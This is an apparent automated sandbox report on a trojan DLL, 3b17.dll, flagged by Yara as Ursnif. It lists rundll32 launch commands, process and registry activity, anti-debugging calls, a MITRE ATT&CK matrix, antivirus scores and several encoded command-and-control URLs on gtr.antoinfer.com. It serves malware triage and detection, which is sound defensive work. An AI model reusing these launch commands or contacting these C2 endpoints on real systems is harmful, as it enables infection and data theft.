Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1EDC20	3_2_6E1EDC20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E208CB7	3_2_6E208CB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F8CD4	3_2_6E1F8CD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F0534	3_2_6E1F0534
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F8AA2	3_2_6E1F8AA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2162C0	3_2_6E2162C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1EAB67	3_2_6E1EAB67
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E208B97	3_2_6E208B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F93EE	3_2_6E1F93EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1EE050	3_2_6E1EE050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F8861	3_2_6E1F8861
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F917A	3_2_6E1F917A

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1DE9F0 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1DE9F0 appears 37 times

Source: 3b17.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal80.troj.winDLL@18/8@6/1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_00E8513E

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP

Jump to behavior

Source: 3b17.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing

Source: 3b17.dll	Metadefender: Detection: 22%
Source: 3b17.dll	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3b17.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 3b17.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 3b17.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress,

0_2_6E191F7C

Source: 3b17.dll

Static PE information: real checksum: 0xa34b8 should be: 0x9effb

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E192200 push ecx; ret	0_2_6E192209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E192253 push ecx; ret	0_2_6E192263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E217583 push ecx; ret	0_2_6E217596
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E87A60 push ecx; ret	3_2_00E87A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E87DCF push ecx; ret	3_2_00E87DDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E217583 push ecx; ret	3_2_6E217596

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E1DE78D

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress,

0_2_6E191F7C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h]	0_2_6E20227F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h]	0_2_6E1F2120
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h]	0_2_6E21E801
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h]	0_2_6E21E730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E21E337 push dword ptr fs:[00000030h]	0_2_6E21E337
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h]	3_2_6E20227F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h]	3_2_6E1F2120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h]	3_2_6E21E801
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h]	3_2_6E21E730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E21E337 push dword ptr fs:[00000030h]	3_2_6E21E337

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1DE78D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E1DDFF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1F18EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1DE78D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E1DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1F18EF

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1DEBB6 cpuid

0_2_6E1DEBB6

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_6E191E8A

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E191144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6E191144

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E84454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_00E84454

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E201C7E _free,GetTimeZoneInformation,_free,

0_2_6E201C7E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E191F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E191F10

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3b17.dll	23%	Metadefender		Browse
3b17.dll	55%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.e80000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
2.2.rundll32.exe.730000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.560000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://gtr.antoinfer.com/favicon.ico	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_	0%	Avira URL Cloud	safe
